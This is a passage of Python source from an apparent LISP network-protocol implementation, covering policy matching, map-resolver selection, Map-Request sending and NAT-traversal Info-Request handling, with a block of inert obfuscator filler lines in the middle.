    def __init__(self, datetime_str):
        self.datetime_name = datetime_str
        self.datetime = None
        self.parse_datetime()

    def valid_datetime(self):
        dt_str = self.datetime_name
        if (dt_str.find(":") == -1): return (False)
        if (dt_str.find("-") == -1): return (False)
        year, month, day, hhmmss = dt_str[0:4], dt_str[5:7], dt_str[8:10], \
            dt_str[11::]

        #
        # Zero-padded two-digit strings compare correctly as strings.
        #
        if ((year + month + day).isdigit() == False): return (False)
        if (month < "01" or month > "12"): return (False)
        if (day < "01" or day > "31"): return (False)

        hour, minute, second = hhmmss.split(":")

        if ((hour + minute + second).isdigit() == False): return (False)
        if (hour < "00" or hour > "23"): return (False)
        if (minute < "00" or minute > "59"): return (False)
        if (second < "00" or second > "59"): return (False)
        return (True)

    def parse_datetime(self):

        #
        # Strip punctuation so "yyyy-mm-dd-hh:mm:ss" compares as an integer.
        #
        dt = self.datetime_name
        dt = dt.replace("-", "")
        dt = dt.replace(":", "")
        self.datetime = int(dt)

    def now(self):
        dt = datetime.datetime.now().strftime("%Y-%m-%d-%H:%M:%S")
        dt = lisp_datetime(dt)
        return (dt)

    def print_datetime(self):
        return (self.datetime_name)

    def future(self):
        return (self.datetime > self.now().datetime)

    def past(self):
        return (self.future() == False)

    def now_in_range(self, upper):
        return (self.past() and upper.future())

    def this_year(self):
        now = str(self.now().datetime)[0:4]
        dt = str(self.datetime)[0:4]
        return (dt == now)

    def this_month(self):
        now = str(self.now().datetime)[0:6]
        dt = str(self.datetime)[0:6]
        return (dt == now)

    def today(self):
        now = str(self.now().datetime)[0:8]
        dt = str(self.datetime)[0:8]
        return (dt == now)
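
# Editor's sketch (not from the original source): parse_datetime() relies on
# "yyyy-mm-dd-hh:mm:ss" turning into an integer whose numeric order matches
# chronological order once the punctuation is stripped:
#
#   earlier = int("2024-06-01-08:00:00".replace("-", "").replace(":", ""))
#   later = int("2024-06-01-09:30:00".replace("-", "").replace(":", ""))
#   assert earlier < later        # 20240601080000 < 20240601093000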

class lisp_policy_match(object):
    def __init__(self):
        self.source_eid = None
        self.dest_eid = None
        self.source_rloc = None
        self.dest_rloc = None
        self.rloc_record_name = None
        self.geo_name = None
        self.elp_name = None
        self.rle_name = None
        self.json_name = None
        self.datetime_lower = None
        self.datetime_upper = None

class lisp_policy(object):
    def __init__(self, policy_name):
        self.policy_name = policy_name
        self.match_clauses = []
        self.set_action = None
        self.set_record_ttl = None
        self.set_source_eid = None
        self.set_dest_eid = None
        self.set_rloc_address = None
        self.set_rloc_record_name = None
        self.set_geo_name = None
        self.set_elp_name = None
        self.set_rle_name = None
        self.set_json_name = None

    def match_policy_map_request(self, mr, srloc):
        for match in self.match_clauses:

            #
            # A clause matches only if every configured field matches; a
            # field left unconfigured (None) is a wildcard.
            #
            policy_addr = match.source_eid
            addr = mr.source_eid
            if (policy_addr and addr and
                addr.is_more_specific(policy_addr) == False): continue

            policy_addr = match.dest_eid
            addr = mr.target_eid
            if (policy_addr and addr and
                addr.is_more_specific(policy_addr) == False): continue

            policy_addr = match.source_rloc
            addr = srloc
            if (policy_addr and addr and
                addr.is_more_specific(policy_addr) == False): continue

            lower = match.datetime_lower
            upper = match.datetime_upper
            if (lower and upper and
                lower.now_in_range(upper) == False): continue
            return (True)

        return (False)
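
# Editor's sketch (not from the original source): each match clause treats an
# unset field as a wildcard, so a clause matches when no configured field
# disagrees. Reduced to hypothetical plain dictionaries:
#
#   def clause_matches(clause, request):
#       for field, value in list(request.items()):
#           if (clause.get(field) != None and clause[field] != value):
#               return (False)
#       return (True)
#
#   clause_matches({"dest_eid": "10.0.0.0/8"},
#       {"source_eid": "1.1.1.1/32", "dest_eid": "10.0.0.0/8"})   # True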

    def set_policy_map_reply(self):

        #
        # Return None if no set-clause supplies an RLOC attribute.
        #
        nothing_to_set = (self.set_rloc_address == None and
            self.set_rloc_record_name == None and self.set_geo_name == None
            and self.set_elp_name == None and self.set_rle_name == None)
        if (nothing_to_set): return (None)

        rloc = lisp_rloc()
        if (self.set_rloc_address):
            rloc.rloc.copy_address(self.set_rloc_address)
            addr_str = rloc.rloc.print_address_no_iid()
            lprint("Policy set-rloc-address to {}".format(addr_str))

        if (self.set_rloc_record_name):
            rloc.rloc_name = self.set_rloc_record_name
            name = blue(rloc.rloc_name, False)
            lprint("Policy set-rloc-record-name to {}".format(name))

        if (self.set_geo_name):
            rloc.geo_name = self.set_geo_name
            name = rloc.geo_name
            not_found = "" if (name in lisp_geo_list) else "(not configured)"
            lprint("Policy set-geo-name '{}' {}".format(name, not_found))

        if (self.set_elp_name):
            rloc.elp_name = self.set_elp_name
            name = rloc.elp_name
            not_found = "" if (name in lisp_elp_list) else "(not configured)"
            lprint("Policy set-elp-name '{}' {}".format(name, not_found))

        if (self.set_rle_name):
            rloc.rle_name = self.set_rle_name
            name = rloc.rle_name
            not_found = "" if (name in lisp_rle_list) else "(not configured)"
            lprint("Policy set-rle-name '{}' {}".format(name, not_found))

        if (self.set_json_name):
            rloc.json_name = self.set_json_name
            name = rloc.json_name
            not_found = "" if (name in lisp_json_list) else "(not configured)"
            lprint("Policy set-json-name '{}' {}".format(name, not_found))

        return (rloc)

    def save_policy(self):
        lisp_policies[self.policy_name] = self

class lisp_pubsub(object):
    def __init__(self, itr, port, nonce, ttl, xtr_id):
        self.itr = itr
        self.port = port
        self.nonce = nonce
        self.uptime = lisp_get_timestamp()
        self.ttl = ttl
        self.xtr_id = xtr_id
        self.map_notify_count = 0
        self.eid_prefix = None

    def add(self, eid_prefix):
        self.eid_prefix = eid_prefix
        ttl = self.ttl
        eid_str = eid_prefix.print_prefix()
        if (eid_str not in lisp_pubsub_cache):
            lisp_pubsub_cache[eid_str] = {}

        entries = lisp_pubsub_cache[eid_str]

        #
        # A second subscribe from the same xtr-id replaces the old state.
        #
        action = "Add"
        if (self.xtr_id in entries):
            action = "Replace"
            del(entries[self.xtr_id])

        entries[self.xtr_id] = self

        eid_str = green(eid_str, False)
        itr_str = red(self.itr.print_address_no_iid(), False)
        xtr_id_str = "0x" + lisp_hex_string(self.xtr_id)
        lprint("{} pubsub state {} for {}, xtr-id: {}, ttl {}".format(action,
            eid_str, itr_str, xtr_id_str, ttl))

    def delete(self, eid_prefix):
        eid_str = eid_prefix.print_prefix()
        itr_str = red(self.itr.print_address_no_iid(), False)
        xtr_id_str = "0x" + lisp_hex_string(self.xtr_id)
        if (eid_str in lisp_pubsub_cache):
            entries = lisp_pubsub_cache[eid_str]
            if (self.xtr_id in entries):
                entries.pop(self.xtr_id)
                lprint("Remove pubsub state {} for {}, xtr-id: {}".format(
                    eid_str, itr_str, xtr_id_str))
if 15 - 15: ooOoO0o . Oo0Ooo
if 42 - 42: OOooOOo . i11iIiiIii % O0 - OoO0O00
if 34 - 34: OOooOOo % oO0o * OOooOOo * iIii1I11I1II1
if 18 - 18: I1IiiI / I11i
if 64 - 64: I11i * i11iIiiIii
if 16 - 16: I1Ii111 * II111iiii * I1Ii111 . o0oOOo0O0Ooo
if 96 - 96: ooOoO0o - o0oOOo0O0Ooo % O0 * Ii1I . OoOoOO00
if 80 - 80: I1IiiI
if 31 - 31: I1Ii111 + o0oOOo0O0Ooo . I1IiiI + I11i . oO0o
if 50 - 50: Ii1I . OOooOOo
if 84 - 84: OoOoOO00 * OoO0O00 + I1IiiI
if 38 - 38: OoooooooOO % I1IiiI
if 80 - 80: iII111i / O0 % OoooooooOO / Oo0Ooo
if 75 - 75: ooOoO0o
if 72 - 72: oO0o . OoooooooOO % ooOoO0o % OoO0O00 * oO0o * OoO0O00
if 14 - 14: I11i / I11i
if 90 - 90: O0 * OOooOOo / oO0o . Oo0Ooo * I11i
if 93 - 93: oO0o / ooOoO0o - I1Ii111

class lisp_trace(object):
    def __init__(self):
        self.nonce = lisp_get_control_nonce()
        self.packet_json = []
        self.local_rloc = None
        self.local_port = None
        self.lisp_socket = None

    def print_trace(self):
        trace = self.packet_json
        lprint("LISP-Trace JSON: '{}'".format(trace))

    def encode(self):
        first_long = socket.htonl(0x90000000)
        packet = struct.pack("II", first_long, 0)
        packet += struct.pack("Q", self.nonce)
        packet += json.dumps(self.packet_json)
        return (packet)

    def decode(self, packet):
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (False)
        first_long = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        first_long = socket.ntohl(first_long)
        if ((first_long & 0xff000000) != 0x90000000): return (False)

        #
        # The second long carries the local RLOC; the low 16 bits of the
        # first long carry the local port.
        #
        if (len(packet) < format_size): return (False)
        addr = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]

        addr = socket.ntohl(addr)
        byte1 = addr >> 24
        byte2 = (addr >> 16) & 0xff
        byte3 = (addr >> 8) & 0xff
        byte4 = addr & 0xff
        self.local_rloc = "{}.{}.{}.{}".format(byte1, byte2, byte3, byte4)
        self.local_port = str(first_long & 0xffff)

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return (False)
        self.nonce = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (len(packet) == 0): return (True)

        try:
            self.packet_json = json.loads(packet)
        except:
            return (False)
        return (True)

    def myeid(self, eid):
        return (lisp_is_myeid(eid))

    def return_to_sender(self, lisp_socket, rts_rloc, packet):

        #
        # Prefer a cached NAT-translated address; otherwise parse the
        # "rloc:port" string we were handed.
        #
        rloc, port = self.rtr_cache_nat_trace_find(rts_rloc)
        if (rloc == None):
            rloc, port = rts_rloc.split(":")
            port = int(port)
            lprint("Send LISP-Trace to address {}:{}".format(rloc, port))
        else:
            lprint("Send LISP-Trace to translated address {}:{}".format(rloc,
                port))

        if (lisp_socket == None):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            sock.bind(("0.0.0.0", LISP_TRACE_PORT))
            sock.sendto(packet, (rloc, port))
            sock.close()
        else:
            lisp_socket.sendto(packet, (rloc, port))

    def packet_length(self):
        udp_len = 8; trace_len = 4 + 4 + 8
        return (udp_len + trace_len + len(json.dumps(self.packet_json)))

    def rtr_cache_nat_trace(self, translated_rloc, translated_port):
        key = self.local_rloc + ":" + self.local_port
        value = (translated_rloc, translated_port)
        lisp_rtr_nat_trace_cache[key] = value
        lprint("Cache NAT Trace addresses {} -> {}".format(key, value))

    def rtr_cache_nat_trace_find(self, local_rloc_and_port):
        key = local_rloc_and_port
        try: value = lisp_rtr_nat_trace_cache[key]
        except: value = (None, None)
        return (value)
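
# Editor's sketch (not from the original source): the LISP-Trace header that
# encode()/decode() above build is two network-order longs (type 0x9 plus
# local port, then local RLOC), a 64-bit nonce, and a JSON tail. A standalone
# round-trip with a hypothetical nonce:
#
#   import json, socket, struct
#   packet = struct.pack("II", socket.htonl(0x90000000), 0)
#   packet += struct.pack("Q", 0x1122334455667788)
#   packet += json.dumps([]).encode()
#   first_long = socket.ntohl(struct.unpack("I", packet[0:4])[0])
#   assert (first_long & 0xff000000) == 0x90000000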

def lisp_get_map_server(address):
    for ms in list(lisp_map_servers_list.values()):
        if (ms.map_server.is_exact_match(address)): return (ms)
    return (None)

def lisp_get_any_map_server():
    for ms in list(lisp_map_servers_list.values()): return (ms)
    return (None)

def lisp_get_map_resolver(address, eid):
    if (address != None):

        #
        # Exact address lookup.
        #
        addr_str = address.print_address()
        mr = None
        for key in lisp_map_resolvers_list:
            if (key.find(addr_str) == -1): continue
            mr = lisp_map_resolvers_list[key]
        return (mr)

    #
    # Otherwise select by mr-name: "" means any resolver, None means "all",
    # and an EID selects the mr-name from its matching database-mapping.
    #
    if (eid == ""):
        mr_name = ""
    elif (eid == None):
        mr_name = "all"
    else:
        db = lisp_db_for_lookups.lookup_cache(eid, False)
        mr_name = "all" if db == None else db.use_mr_name

    oldest = None
    for mr in list(lisp_map_resolvers_list.values()):
        if (mr_name == ""): return (mr)
        if (mr.mr_name != mr_name): continue
        if (oldest == None or mr.last_used < oldest.last_used): oldest = mr

    return (oldest)
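
# Editor's note (not from the original source): the selection loop above is a
# least-recently-used pick over the name-filtered resolvers; with plain lists
# it reduces to:
#
#   candidates = [mr for mr in resolvers if mr.mr_name == mr_name]
#   oldest = min(candidates, key=lambda mr: mr.last_used) if candidates \
#       else None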

def lisp_get_decent_map_resolver(eid):

    #
    # LISP-Decent hashes the EID to an index that selects the DNS name of
    # the responsible map-resolver.
    #
    index = lisp_get_decent_index(eid)
    dns_name = str(index) + "." + lisp_decent_dns_suffix

    lprint("Use LISP-Decent map-resolver {} for EID {}".format(
        bold(dns_name, False), eid.print_prefix()))

    oldest = None
    for mr in list(lisp_map_resolvers_list.values()):
        if (dns_name != mr.dns_name): continue
        if (oldest == None or mr.last_used < oldest.last_used): oldest = mr

    return (oldest)

def lisp_ipv4_input(packet):

    #
    # Pass IGMP packets (protocol 2) up unmodified.
    #
    if (ord(packet[9:10]) == 2): return ([True, packet])

    #
    # Verify the IPv4 header checksum: recomputing it over a valid header
    # leaves a stored checksum of 0.
    #
    checksum = struct.unpack("H", packet[10:12])[0]
    if (checksum == 0):
        dprint("Packet arrived with checksum of 0!")
    else:
        packet = lisp_ip_checksum(packet)
        checksum = struct.unpack("H", packet[10:12])[0]
        if (checksum != 0):
            dprint("IPv4 header checksum failed for inner header")
            packet = lisp_format_packet(packet[0:20])
            dprint("Packet header: {}".format(packet))
            return ([False, None])

    #
    # Check and decrement the TTL, then zero and recompute the checksum.
    #
    ttl = struct.unpack("B", packet[8:9])[0]
    if (ttl == 0):
        dprint("IPv4 packet arrived with ttl 0, packet discarded")
        return ([False, None])
    elif (ttl == 1):
        dprint("IPv4 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return ([False, None])

    ttl -= 1
    packet = packet[0:8] + struct.pack("B", ttl) + packet[9::]
    packet = packet[0:10] + struct.pack("H", 0) + packet[12::]
    packet = lisp_ip_checksum(packet)
    return ([False, packet])
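
# Editor's sketch (not from the original source): a minimal standalone
# version of the checksum logic lisp_ip_checksum() is used for above --
# sum the header as 16-bit words, fold the carries, and store the one's
# complement in bytes 10-11 (zero the field first when generating):
#
#   import struct
#   def ip_checksum(header):                  # header: 20-byte IPv4 header
#       total = sum(struct.unpack("!10H", header[0:20]))
#       while (total >> 16): total = (total & 0xffff) + (total >> 16)
#       return (header[0:10] + struct.pack("!H", ~total & 0xffff) +
#           header[12:20])
#
# A valid header sums to 0xffff, so rerunning this over a received header
# stores a zero checksum -- exactly the "!= 0 means corrupt" test above.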

def lisp_ipv6_input(packet):
    dest = packet.inner_dest
    packet = packet.packet

    #
    # Check and decrement the hop-limit (byte 7 of the IPv6 header). IPv6
    # has no header checksum, so this byte is the only rewrite needed.
    #
    hop_limit = struct.unpack("B", packet[7:8])[0]
    if (hop_limit == 0):
        dprint("IPv6 packet arrived with hop-limit 0, packet discarded")
        return (None)
    elif (hop_limit == 1):
        dprint("IPv6 packet {}, packet discarded".format(bold("ttl expiry",
            False)))
        return (None)

    #
    # Never encapsulate link-local destinations.
    #
    if (dest.is_ipv6_link_local()):
        dprint("Do not encapsulate IPv6 link-local packets")
        return (None)

    hop_limit -= 1
    packet = packet[0:7] + struct.pack("B", hop_limit) + packet[8::]
    return (packet)

def lisp_mac_input(packet):
    return (packet)

def lisp_rate_limit_map_request(dest):
    now = lisp_get_timestamp()

    #
    # Honor a "no rate-limit" grace period after startup or a restart.
    #
    elapsed = now - lisp_no_map_request_rate_limit
    if (elapsed < LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME):
        seconds = int(LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME - elapsed)
        dprint("No Rate-Limit Mode for another {} secs".format(seconds))
        return (False)

    #
    # Otherwise rate-limit if the last Map-Request went out too recently.
    #
    if (lisp_last_map_request_sent == None): return (False)
    elapsed = now - lisp_last_map_request_sent
    rate_limit = (elapsed < LISP_MAP_REQUEST_RATE_LIMIT)

    if (rate_limit):
        dprint("Rate-limiting Map-Request for {}, sent {} secs ago".format(
            green(dest.print_address(), False), round(elapsed, 3)))
    return (rate_limit)
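
# Editor's sketch (not from the original source): the same interval test as a
# self-contained helper (this variant also records the send time, which the
# function above leaves to the Map-Request sender), with a hypothetical
# 2-second limit:
#
#   import time
#   last_sent = None
#   def rate_limited(limit=2.0):
#       global last_sent
#       now = time.time()
#       if (last_sent != None and now - last_sent < limit): return (True)
#       last_sent = now
#       return (False)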

def lisp_send_map_request(lisp_sockets, lisp_ephem_port, seid, deid, rloc,
    pubsub=False):
    global lisp_last_map_request_sent

    #
    # An RLOC argument means this is an RLOC-probe.
    #
    probe_dest = probe_port = None
    if (rloc):
        probe_dest = rloc.rloc
        probe_port = rloc.translated_port if lisp_i_am_rtr else LISP_DATA_PORT

    #
    # Find our ITR-RLOCs; give up if we have no IPv4 RLOC, or no IPv6 RLOC
    # when probing an IPv6 destination.
    #
    itr_rloc4, itr_rloc6, device = lisp_myrlocs
    if (itr_rloc4 == None):
        lprint("Suppress sending Map-Request, IPv4 RLOC not found")
        return

    if (itr_rloc6 == None and probe_dest != None and probe_dest.is_ipv6()):
        lprint("Suppress sending Map-Request, IPv6 RLOC not found")
        return

    map_request = lisp_map_request()
    map_request.record_count = 1
    map_request.nonce = lisp_get_control_nonce()
    map_request.rloc_probe = (probe_dest != None)
    map_request.subscribe_bit = pubsub
    map_request.xtr_id_present = pubsub

    #
    # Remember the nonce so an RLOC-probe reply can be matched.
    #
    if (rloc): rloc.last_rloc_probe_nonce = map_request.nonce

    multicast = deid.is_multicast_address()
    if (multicast):
        map_request.target_eid = seid
        map_request.target_group = deid
    else:
        map_request.target_eid = deid

    #
    # Sign the Map-Request (but not RLOC-probes) when a signature-EID is
    # configured.
    #
    if (map_request.rloc_probe == False):
        db = lisp_get_signature_eid()
        if (db):
            map_request.signature_eid.copy_address(db.eid)
            map_request.privkey_filename = "./lisp-sig.pem"

    if (seid == None or multicast):
        map_request.source_eid.afi = LISP_AFI_NONE
    else:
        map_request.source_eid = seid

    #
    # Behind a NAT, a non-private RLOC-probe destination must be reached
    # with our translated RLOC as the ITR-RLOC.
    #
    if (probe_dest != None and lisp_nat_traversal and lisp_i_am_rtr == False):
        if (probe_dest.is_private_address() == False):
            itr_rloc4 = lisp_get_any_translated_rloc()

        if (itr_rloc4 == None):
            lprint("Suppress sending Map-Request, translated RLOC not found")
            return

    #
    # Build the ITR-RLOCs list: IPv4 and/or IPv6 depending on what we have
    # and what we are probing.
    #
    if (probe_dest == None or probe_dest.is_ipv4()):
        if (lisp_nat_traversal and probe_dest == None):
            translated = lisp_get_any_translated_rloc()
            if (translated != None): itr_rloc4 = translated

        map_request.itr_rlocs.append(itr_rloc4)

    if (probe_dest == None or probe_dest.is_ipv6()):
        if (itr_rloc6 == None or itr_rloc6.is_ipv6_link_local()):
            itr_rloc6 = None
        else:
            map_request.itr_rloc_count = 1 if (probe_dest == None) else 0
            map_request.itr_rlocs.append(itr_rloc6)

    #
    # Choose the inner source address for the ECM.
    #
    if (probe_dest != None and map_request.itr_rlocs != []):
        itr_rloc = map_request.itr_rlocs[0]
    else:
        if (deid.is_ipv4()):
            itr_rloc = itr_rloc4
        elif (deid.is_ipv6()):
            itr_rloc = itr_rloc6
        else:
            itr_rloc = itr_rloc4

    packet = map_request.encode(probe_dest, probe_port)
    map_request.print_map_request()

    #
    # RLOC-probes are sent directly, data-encapsulated when the RLOC is
    # behind a NAT; everything else goes to a map-resolver in an ECM.
    #
    if (probe_dest != None):
        if (rloc.is_rloc_translated()):
            nat_info = lisp_get_nat_info(probe_dest, rloc.rloc_name)

            #
            # A gleaned RLOC may have no NAT state; synthesize it.
            #
            if (nat_info == None):
                addr_str = rloc.rloc.print_address_no_iid()
                hostname = "gleaned-{}".format(addr_str)
                port = rloc.translated_port
                nat_info = lisp_nat_info(addr_str, hostname, port)

            lisp_encapsulate_rloc_probe(lisp_sockets, probe_dest, nat_info,
                packet)
            return

        dest_str = probe_dest.print_address_no_iid()
        dest = lisp_convert_4to6(dest_str)
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
        return

    #
    # Select a map-resolver: LISP-Decent hashes the EID to a DNS name,
    # otherwise use the source-EID's configured map-resolver.
    #
    seid_or_none = None if lisp_i_am_rtr else seid
    if (lisp_decent_pull_xtr_configured()):
        mr = lisp_get_decent_map_resolver(deid)
    else:
        mr = lisp_get_map_resolver(None, seid_or_none)

    if (mr == None):
        lprint("Cannot find Map-Resolver for source-EID {}".format(
            green(seid.print_address(), False)))
        return

    mr.last_used = lisp_get_timestamp()
    mr.map_requests_sent += 1
    if (mr.last_nonce == 0): mr.last_nonce = map_request.nonce

    #
    # Encapsulate the Map-Request in an ECM and note the send time for
    # rate-limiting.
    #
    if (seid == None): seid = itr_rloc
    lisp_send_ecm(lisp_sockets, packet, seid, lisp_ephem_port, deid,
        mr.map_resolver)

    lisp_last_map_request_sent = lisp_get_timestamp()

    #
    # Do a DNS lookup periodically in case the map-resolver address changed.
    #
    mr.resolve_dns_name()
    return

def lisp_send_info_request(lisp_sockets, dest, port, device_name):

    #
    # Build the Info-Request and append the device name to the hostname so
    # one host can register state per interface.
    #
    info = lisp_info()
    info.nonce = lisp_get_control_nonce()
    if (device_name): info.hostname += "-" + device_name

    dest_str = dest.print_address_no_iid()

    #
    # When multi-homing, make sure the Info-Request leaves the requested
    # interface by temporarily installing a host route to the destination
    # via that interface's default-route next-hop.
    #
    host_route_installed = False
    if (device_name):
        next_hop = lisp_get_host_route_next_hop(dest_str)

        #
        # For the control port, wait for any stale host route to go away
        # before checking the default next-hops.
        #
        if (port == LISP_CTRL_PORT and next_hop != None):
            while (True):
                time.sleep(.01)
                next_hop = lisp_get_host_route_next_hop(dest_str)
                if (next_hop == None): break

        default_next_hops = lisp_get_default_route_next_hops()
        for device, nh in default_next_hops:
            if (device != device_name): continue

            if (next_hop != nh):
                if (next_hop != None):
                    lisp_install_host_route(dest_str, next_hop, False)

                lisp_install_host_route(dest_str, nh, True)
                host_route_installed = True
            break

    #
    # Encode and log the Info-Request.
    #
    packet = info.encode()
    info.print_info()

    reason = "(for control)" if port == LISP_CTRL_PORT else "(for data)"
    reason = bold(reason, False)
    port_str = bold("{}".format(port), False)
    dest_color = red(dest_str, False)
    node = "RTR " if port == LISP_DATA_PORT else "MS "
    lprint("Send Info-Request to {}{}, port {} {}".format(node, dest_color,
        port_str, reason))

    #
    # Control-port Info-Requests go out natively; data-port ones are
    # prepended with a LISP data header carrying instance-id 0xffffff.
    #
    if (port == LISP_CTRL_PORT):
        lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
    else:
        header = lisp_data_header()
        header.instance_id(0xffffff)
        header = header.encode()
        if (header):
            packet = header + packet

            lisp_send(lisp_sockets, dest, LISP_DATA_PORT, packet)

    #
    # Remove the temporary host route.
    #
    if (host_route_installed):
        lisp_install_host_route(dest_str, None, False)
        if (next_hop != None):
            lisp_install_host_route(dest_str, next_hop, True)
    return
def lisp_process_info_request(lisp_sockets, packet, addr_str, sport, rtr_list):

    #
    # Parse Info-Request packet. If it doesn't decode, drop it.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return
    info.print_info()

    #
    # Turn the request into an Info-Reply. The global RLOC and port are
    # the translated (outside-the-NAT) address and port the request
    # arrived from.
    #
    info.info_reply = True
    info.global_etr_rloc.store_address(addr_str)
    info.etr_port = sport

    #
    # Echo the hostname back as a distinguished-name private RLOC.
    #
    if (info.hostname != None):
        info.private_etr_rloc.afi = LISP_AFI_NAME
        info.private_etr_rloc.store_address(info.hostname)

    if (rtr_list != None): info.rtr_list = rtr_list
    packet = info.encode()
    info.print_info()

    #
    # Send the Info-Reply back to the source of the Info-Request.
    #
    lprint("Send Info-Reply to {}".format(red(addr_str, False)))
    dest = lisp_convert_4to6(addr_str)
    lisp_send(lisp_sockets, dest, sport, packet)

    #
    # Cache the source of the Info-Request so later control messages can
    # be returned to the same translated address and port.
    #
    info_source = lisp_info_source(info.hostname, addr_str, sport)
    info_source.cache_address_for_info_source()
    return
def lisp_get_signature_eid():

    #
    # Return the first database-mapping entry configured with a
    # signature-eid, or None.
    #
    for db in lisp_db_list:
        if (db.signature_eid): return(db)
    return(None)
def lisp_get_any_translated_port():

    #
    # Return the first translated (NAT) port found in any
    # database-mapping RLOC entry, or None.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_port)
    return(None)
def lisp_get_any_translated_rloc():

    #
    # Return the first translated (NAT) RLOC found in any
    # database-mapping RLOC entry, or None.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.translated_rloc.is_null()): continue
            return(rloc_entry.translated_rloc)
    return(None)
def lisp_get_all_translated_rlocs():

    #
    # Return a list of all translated RLOC addresses, as strings.
    #
    rloc_list = []
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            if (rloc_entry.is_rloc_translated() == False): continue
            address = rloc_entry.translated_rloc.print_address_no_iid()
            rloc_list.append(address)
    return(rloc_list)
def lisp_update_default_routes(map_resolver, iid, rtr_list):
    behind_nat = (os.getenv("LISP_RTR_BEHIND_NAT") != None)

    #
    # Filter out private RTR addresses when this RTR is behind a NAT.
    #
    new_rtr_list = {}
    for rtr_str in rtr_list:
        if (rtr_str == None): continue
        rtr = rtr_list[rtr_str]
        if (behind_nat and rtr.is_private_address()): continue
        new_rtr_list[rtr_str] = rtr
    rtr_list = new_rtr_list

    prefix_list = []
    for afi in [LISP_AFI_IPV4, LISP_AFI_IPV6, LISP_AFI_MAC]:
        if (afi == LISP_AFI_MAC and lisp_l2_overlay == False): break

        #
        # Remove any existing unicast default route, unless its RLOC-set
        # already matches the RTR list.
        #
        eid = lisp_address(afi, "", 0, iid)
        eid.make_default_route(eid)
        mc = lisp_map_cache.lookup_cache(eid, True)
        if (mc):
            if (mc.checkpoint_entry):
                lprint("Updating checkpoint entry for {}".format(
                    green(mc.print_eid_tuple(), False)))
            elif (mc.do_rloc_sets_match(list(rtr_list.values()))):
                continue
            mc.delete_cache()

        prefix_list.append([eid, ""])

        #
        # Remove any existing multicast default route.
        #
        group = lisp_address(afi, "", 0, iid)
        group.make_default_multicast_route(group)
        gmc = lisp_map_cache.lookup_cache(group, True)
        if (gmc): gmc = gmc.source_cache.lookup_cache(eid, True)
        if (gmc): gmc.delete_cache()

        prefix_list.append([eid, group])

    if (len(prefix_list) == 0): return

    #
    # Build an RLOC-set from the RTR list, with low priority so
    # RLOC-probed entries are preferred.
    #
    rloc_set = []
    for rtr_str in rtr_list:
        rtr_addr = rtr_list[rtr_str]
        rloc = lisp_rloc()
        rloc.rloc.copy_address(rtr_addr)
        rloc.priority = 254
        rloc.mpriority = 255
        rloc.rloc_name = "RTR"
        rloc_set.append(rloc)

    #
    # Add a default map-cache entry per prefix, giving each its own copy
    # of the RLOC-set.
    #
    for prefix in prefix_list:
        mc = lisp_mapping(prefix[0], prefix[1], rloc_set)
        mc.mapping_source = map_resolver
        mc.map_cache_ttl = LISP_MR_TTL * 60
        mc.add_cache()
        lprint("Add {} to map-cache with RTR RLOC-set: {}".format(
            green(mc.print_eid_tuple(), False), list(rtr_list.keys())))

        rloc_set = copy.deepcopy(rloc_set)
    return
def lisp_process_info_reply(source, packet, store):

    #
    # Parse Info-Reply. If it doesn't decode, give up.
    #
    info = lisp_info()
    packet = info.decode(packet)
    if (packet == None): return([None, None, False])

    info.print_info()

    #
    # Process any RTR-list returned in the Info-Reply.
    #
    new_rtr = False
    for rtr in info.rtr_list:
        addr_str = rtr.print_address_no_iid()
        if (addr_str in lisp_rtr_list):
            if (lisp_register_all_rtrs == False): continue
            if (lisp_rtr_list[addr_str] != None): continue
        new_rtr = True
        lisp_rtr_list[addr_str] = rtr

    #
    # An ITR installs default map-cache entries pointing at the RTR set,
    # one per configured instance-id.
    #
    if (lisp_i_am_itr and new_rtr):
        if (lisp_iid_to_interface == {}):
            lisp_update_default_routes(source, lisp_default_iid,
                lisp_rtr_list)
        else:
            for iid in list(lisp_iid_to_interface.keys()):
                lisp_update_default_routes(source, int(iid), lisp_rtr_list)

    #
    # If the caller does not want the translation stored, just return it.
    #
    if (store == False):
        return([info.global_etr_rloc, info.etr_port, new_rtr])

    #
    # Store the translated RLOC and port in each matching
    # database-mapping RLOC entry.
    #
    for db in lisp_db_list:
        for rloc_entry in db.rloc_set:
            rloc = rloc_entry.rloc
            interface = rloc_entry.interface
            if (interface == None):
                if (rloc.is_null()): continue
                if (rloc.is_local() == False): continue
                if (info.private_etr_rloc.is_null() == False and
                    rloc.is_exact_match(info.private_etr_rloc) == False):
                    continue
            elif (info.private_etr_rloc.is_dist_name()):
                name = info.private_etr_rloc.address
                if (name != rloc_entry.rloc_name): continue

            eid_str = green(db.eid.print_prefix(), False)
            rloc_str = red(rloc.print_address_no_iid(), False)

            #
            # If the global RLOC equals the local one and no port was
            # translated, there is no NAT in the path.
            #
            matched = info.global_etr_rloc.is_exact_match(rloc)
            if (rloc_entry.translated_port == 0 and matched):
                lprint("No NAT for {} ({}), EID-prefix {}".format(rloc_str,
                    interface, eid_str))
                continue

            #
            # Skip if the translation did not change.
            #
            global_rloc = info.global_etr_rloc
            translated = rloc_entry.translated_rloc
            if (translated.is_exact_match(global_rloc) and
                info.etr_port == rloc_entry.translated_port): continue

            lprint("Store translation {}:{} for {} ({}), EID-prefix {}".\
                format(red(info.global_etr_rloc.print_address_no_iid(),
                False), info.etr_port, rloc_str, interface, eid_str))

            rloc_entry.store_translated_rloc(info.global_etr_rloc,
                info.etr_port)

    return([info.global_etr_rloc, info.etr_port, new_rtr])
def lisp_test_mr(lisp_sockets, port):
    return                          # Test routine, currently disabled.
    lprint("Test Map-Resolvers")

